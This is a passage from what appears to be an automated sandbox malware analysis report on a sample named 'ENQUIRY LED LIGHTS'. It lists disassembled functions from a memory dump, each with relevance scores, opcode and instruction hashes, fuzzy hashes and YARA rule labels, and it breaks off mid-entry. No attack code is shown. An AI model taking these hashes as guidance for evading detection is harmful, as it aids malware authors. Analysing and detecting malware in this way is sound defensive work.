                                                                                                  • Instruction ID: 004a695c90466d5fb3ddab687a6355c718e4f11368a11dcd76b71b6384c2fc05
                                                                                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                  • Instruction Fuzzy Hash: C4310772B00A04AFD774CF69CD50F56BBF8AB08A94B04092DA69AC3650EB70E900CB60
                                                                                                  Function 02FBEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8bab0f51e10eca9a1b1f8bc52d761055f1e9b9f4a06ae36146e099caadf637d3
                                                                                                  • Instruction ID: 1525ab9d959252fb91fafe3d2ebb1da5e15803cf4d0c77f71ec5be8d9a059f72
                                                                                                  • Opcode Fuzzy Hash: 8bab0f51e10eca9a1b1f8bc52d761055f1e9b9f4a06ae36146e099caadf637d3
                                                                                                  • Instruction Fuzzy Hash: 71319EB194A3018FC712DF19C54059ABBF2FF89399F4449AEE5989B351E331D904CF92
                                                                                                  Function 02F3438F Relevance: .1, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7a4ae13f90232df061ffea5ec30d68dfae1aaf359663ab39a49693028fc81ee3
                                                                                                  • Instruction ID: ac2578fb4f3da28d870486b577fdc61d3aaee7cf1ae50125189aa6471bb35f72
                                                                                                  • Opcode Fuzzy Hash: 7a4ae13f90232df061ffea5ec30d68dfae1aaf359663ab39a49693028fc81ee3
                                                                                                  • Instruction Fuzzy Hash: AF31D132B002459FC711EFA8CE80A6EB7FAAB84798F00857ADB05E7290D734D945CF90
                                                                                                  Function 02F0CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                  • Instruction ID: adf1ec883a7a25883c22d4983b7937529355ca65e285311cf9563aa458082593
                                                                                                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                  • Instruction Fuzzy Hash: E321F532E4025AAACB119BB5C841BBFB7B5EF05784F0981769F55F7280E331C900C7A0
                                                                                                  Function 02FCC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                  • Instruction ID: af3df9a75027c96123feb51d3b4d56ecf8f5f434c3dfecfbc9442e9e82b5c878
                                                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                  • Instruction Fuzzy Hash: A5216036600E5276CB14ABA48E10BBBB7B6EF40794F10C01FFB5987990E734D940C760
                                                                                                  Function 02F0C156 Relevance: .1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35d0a04b4a56f1f12ee4e93baf59d77373378526161587b66cf6b980998d7c70
                                                                                                  • Instruction ID: bdeb771c27fc8c99b56f890c0bf7e5c4f045f7a4cfd89da0395727a675f7478d
                                                                                                  • Opcode Fuzzy Hash: 35d0a04b4a56f1f12ee4e93baf59d77373378526161587b66cf6b980998d7c70
                                                                                                  • Instruction Fuzzy Hash: 503139B2A012148BCB20AF24CC45B7977B5EF41398F94C1A9DE469B381DF75D986CF90
                                                                                                  Function 02F0E420 Relevance: .1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69177be2fc388826530e7a6ddc2d4a89a7bcc13fb85997c4c8dbddd2a148cff7
                                                                                                  • Instruction ID: f7df0f70846ce8333f5813547ea3e395fdfb80f793050a79edfac7e444e60992
                                                                                                  • Opcode Fuzzy Hash: 69177be2fc388826530e7a6ddc2d4a89a7bcc13fb85997c4c8dbddd2a148cff7
                                                                                                  • Instruction Fuzzy Hash: FD31B33AA415289BDB25DE14CD81BEEB7BAAB09790F0108A1E745A72D0D7749E809F90
                                                                                                  Function 02F444B0 Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 46d27429696dc0cbb0b38975da54d4060d459217e527277b2110776be0c35cb8
                                                                                                  • Instruction ID: 7e87b6184e3785986256fce437c18fdcacc413a9a4735ee335ff93e819cf8b82
                                                                                                  • Opcode Fuzzy Hash: 46d27429696dc0cbb0b38975da54d4060d459217e527277b2110776be0c35cb8
                                                                                                  • Instruction Fuzzy Hash: 30219372A047559BCB22DF18C840B6BBBE5FB887A4F014519FE58AB345DB70E901CFA1
                                                                                                  Function 02F44588 Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                  • Instruction ID: 6e0c83becda281a37326822d8c6707d63b4fd99581d289e1ef6f367be1cef0bb
                                                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                  • Instruction Fuzzy Hash: B1219132A00608EBDB15CF58D980A8EBBB5FF48754F108065EE25AB241DAB0EE05CF90
                                                                                                  Function 02F0E388 Relevance: .1, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                  • Instruction ID: f00f23c95596a3c0cc64917a1072255a5b241f3cc245ef889e1d5356f6fd7438
                                                                                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                  • Instruction Fuzzy Hash: FC31AD35600604EFD721CF68C984F6AB7F9EF85394F1049A9E652CB680E730EE01DB50
                                                                                                  Function 02F8E609 Relevance: .1, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 18201a6106858e77878c7a6751e6af93a23b4def24a5c930161c6c4f377d106e
                                                                                                  • Instruction ID: 387625e0e150147945c2d02380227c626ae0db71f2212ffe07a4c3085bdd3eb1
                                                                                                  • Opcode Fuzzy Hash: 18201a6106858e77878c7a6751e6af93a23b4def24a5c930161c6c4f377d106e
                                                                                                  • Instruction Fuzzy Hash: 15319C75A1020ADFCB14DF18C8809AEB7B6FF84344F114569F9099B392E731EA51CF94
                                                                                                  Function 02F906F1 Relevance: .1, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ea0c2a04257e19d102e512d57087479a1f13744bbafdca68a4226ca138fdaa34
                                                                                                  • Instruction ID: d735ecdef69725bdb44fca0f673fd6aea878dc1303762be8279a3ac6c235e65b
                                                                                                  • Opcode Fuzzy Hash: ea0c2a04257e19d102e512d57087479a1f13744bbafdca68a4226ca138fdaa34
                                                                                                  • Instruction Fuzzy Hash: CA21B171A00629DBDF14DF59C881ABEB7F5FF48794F500069EA41AB240D739AD41CFA1
                                                                                                  Function 02F9019F Relevance: .1, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4e0d8d16e1444ef7e221de03340c77de44973f3b0dd045ad20d38db1a84b260
                                                                                                  • Instruction ID: d345e0144ccd9ae1259ac9b031ea146fae4924d2bcb63cfa5bd33002d7ffb235
                                                                                                  • Opcode Fuzzy Hash: b4e0d8d16e1444ef7e221de03340c77de44973f3b0dd045ad20d38db1a84b260
                                                                                                  • Instruction Fuzzy Hash: 17219C71A00654AFDB15DF68DC44F6AB7A8FF49784F1400A9FA04DB691DB38ED40CB64
                                                                                                  Function 02F90283 Relevance: .1, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 54211019f006e45c5cd2b9a64b21c261ecd64bd3fc91b80796572eae0dc457da
                                                                                                  • Instruction ID: e242724e75ba6d96a52a2543d60dfaa00fc16d6a06b47812f4422f2d666f168f
                                                                                                  • Opcode Fuzzy Hash: 54211019f006e45c5cd2b9a64b21c261ecd64bd3fc91b80796572eae0dc457da
                                                                                                  • Instruction Fuzzy Hash: D421B3729083459BEB11EF59C844F6BB7DCEF91394F08045ABE84C7261DB34D948CBA2
                                                                                                  Function 02F32835 Relevance: .1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c603162407c9663b2116e0cab1448c9b2b0937a94d800fff10da92aa7ca61b3
                                                                                                  • Instruction ID: b8c9d2fd1b9122cac7b6c33925dc845d1380279a9144381a9f90ed1b73a5f06e
                                                                                                  • Opcode Fuzzy Hash: 4c603162407c9663b2116e0cab1448c9b2b0937a94d800fff10da92aa7ca61b3
                                                                                                  • Instruction Fuzzy Hash: C521F632B456849BE723576C8C04F283795EF417F4F2903A6EF229B6E2DB68CC41C640
                                                                                                  Function 02F4A30B Relevance: .1, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ae545dbbac55851a58fe9332e5ee012a3c272b317f0faad4dc5b604aaba855f
                                                                                                  • Instruction ID: fe501b6ca09aa59b8e394bcf184f9f969813a878fd80b03003a6539c3ac67a5f
                                                                                                  • Opcode Fuzzy Hash: 4ae545dbbac55851a58fe9332e5ee012a3c272b317f0faad4dc5b604aaba855f
                                                                                                  • Instruction Fuzzy Hash: D721CF36641A109FC725DF29CC40B56B7F6EF08788F148468A649CF761E731E842CF94
                                                                                                  Function 02FCA49A Relevance: .1, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f82d48c5efc7ecfce7842306369d40fb7f580d062af422ee8782349ada1d0132
                                                                                                  • Instruction ID: 3f8d2aba205b47482adeb4c5c956180933377a6b2992d0a6322367152210989b
                                                                                                  • Opcode Fuzzy Hash: f82d48c5efc7ecfce7842306369d40fb7f580d062af422ee8782349ada1d0132
                                                                                                  • Instruction Fuzzy Hash: F1113A72390E1ABFE72259549D00F27769ADBC4BE0F70486CBB08DB2D0EA70EC018795
                                                                                                  Function 02F90946 Relevance: .1, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3ddec7756f597226f83929de960d1e40f8d115f2df7e42f1562341287adfd302
                                                                                                  • Instruction ID: 7793ade9535cdedbb10fff0bc2be781a6f8b692b454dbf740db9c25bbb7a3b73
                                                                                                  • Opcode Fuzzy Hash: 3ddec7756f597226f83929de960d1e40f8d115f2df7e42f1562341287adfd302
                                                                                                  • Instruction Fuzzy Hash: 522119B1E01208AFDB10DFAAD8809AEFBF9FF98740F10012EE609A7240DB749941CF54
                                                                                                  Function 02FA80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                  • Instruction ID: c468b36500ddb41633a7c0f076dbabdcd2fb09162c990d176848a492758fab6a
                                                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                  • Instruction Fuzzy Hash: D4214DB2A00209AFEB129F94CC50BAEBBBAEF48390F204455FA55A7250D774DD51DB50
                                                                                                  Function 02F40124 Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                  • Instruction ID: d619ed944123363770a6f61beb59c81e19b14aab9acc2b1f908e6994ecae8057
                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                  • Instruction Fuzzy Hash: 6B11B273A01604BFE7269F54CC81F9ABBB9EB80794F204429E7059B190DAB1ED44CB50
                                                                                                  Function 02F18770 Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50a7420adbc37b6a24c0b3b3ad2c88dd9ad73975242fd81f4609c007c48df2e2
                                                                                                  • Instruction ID: f9abb654f413c9b3c874109895f8cf4a4317ee72d76ad2d749bf177ddd14ed98
                                                                                                  • Opcode Fuzzy Hash: 50a7420adbc37b6a24c0b3b3ad2c88dd9ad73975242fd81f4609c007c48df2e2
                                                                                                  • Instruction Fuzzy Hash: 7711C831B016189BDB11CF49C6C0A16B7E6EF467D4B984069EE089F205D7B2D901C790
                                                                                                  Function 02F4AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                  • Instruction ID: 13959829a58dbe1998520c9db73f4039d9ff6640b5d63ba9b56472be8d63ae95
                                                                                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                  • Instruction Fuzzy Hash: AE214C72A81640DFD7259F49C950A66FBE6EB84B98F15807DE64597720CBB0EC41CB80
                                                                                                  Function 02F180E9 Relevance: .1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8b31a8489130412d2691042338198f6dde7c58f3660c04823bfa249d7023b607
                                                                                                  • Instruction ID: dd50f3e1a108f90113414d5bb879274872da9e3e4edec04da2eef944223c6038
                                                                                                  • Opcode Fuzzy Hash: 8b31a8489130412d2691042338198f6dde7c58f3660c04823bfa249d7023b607
                                                                                                  • Instruction Fuzzy Hash: D9215E76A00205DFEB14CF58C691B6EBBF5FB89398F64416DD605A7310CB71AD06CB90
                                                                                                  Function 02F4674D Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1bdb86367988a8e08f944c24ec9a3f77e119a4bf96b03a8d5a2c1237f4ee1239
                                                                                                  • Instruction ID: e4b59593d48c18a53cbe1ff032fcf997cef2c22e4594c03729c1d323161e542f
                                                                                                  • Opcode Fuzzy Hash: 1bdb86367988a8e08f944c24ec9a3f77e119a4bf96b03a8d5a2c1237f4ee1239
                                                                                                  • Instruction Fuzzy Hash: 20218C71600A04EFC7209F68C880F66B7E9FF85390F40882DE6AAC7250DFB0A850CB60
                                                                                                  Function 02F3E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0d6c3e28d5ba063e5f2987e512bbc87da5d47e2136c437d6f6646b4f61d156ad
                                                                                                  • Instruction ID: d7186c576c504d4004c13db8c2c7297852209b0a0e8ea0cac5cd0beb62a756c8
                                                                                                  • Opcode Fuzzy Hash: 0d6c3e28d5ba063e5f2987e512bbc87da5d47e2136c437d6f6646b4f61d156ad
                                                                                                  • Instruction Fuzzy Hash: A8110473B051189BCB1ADB24CC91B6B72ABDFC53F4B254529EA269B290DA31DC12C790
                                                                                                  Function 02FA6870 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d49b7ffcce42bba021412838c60ed304d2f40f2d97409406ab02b13cc44a1a1e
                                                                                                  • Instruction ID: 3e3b440619d53cc4fc374550aff4a80cfd9ef52ecbb6c89e5c110d5b3cedf947
                                                                                                  • Opcode Fuzzy Hash: d49b7ffcce42bba021412838c60ed304d2f40f2d97409406ab02b13cc44a1a1e
                                                                                                  • Instruction Fuzzy Hash: A611BF72240614EBDB22DB59CD60F5A77ACBF49BA4F054025F311DB250EA70E804CBA0
                                                                                                  Function 02F466B0 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fc3d24ee08f7cd96e17376a2dff87c1a217ab520cb1735a9a37363b6e6f40879
                                                                                                  • Instruction ID: 192afb08cddacf3d3df83bbf3b917f990f6cbbdcc70b589ef829e79b7a5f1fa8
                                                                                                  • Opcode Fuzzy Hash: fc3d24ee08f7cd96e17376a2dff87c1a217ab520cb1735a9a37363b6e6f40879
                                                                                                  • Instruction Fuzzy Hash: DB11BF76A012189BCB24DF59C980E5ABFE9EF86794F01807ADA09DB310DFB4DD00CB90
                                                                                                  Function 02F10AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                  • Instruction ID: 2edfdd7210d043b075222c53a7b4e5df33a4002a39bacd34c67bdf55528753cc
                                                                                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                  • Instruction Fuzzy Hash: 5621E0B5A00B059FD3A0CF29C480B52BBF4FB48B60F50492EE98AC7B40E771E854CB90
                                                                                                  Function 02FDA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                  • Instruction ID: ab98a4017ed543758c159a83c53711f71b36b9d1b13c8165463f69d8230f14e7
                                                                                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                  • Instruction Fuzzy Hash: 60110132A00919AFCB19CB54CC11B9EB7B6EF84350F098269E946A7340E675AE01CB84
                                                                                                  Function 02F9E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
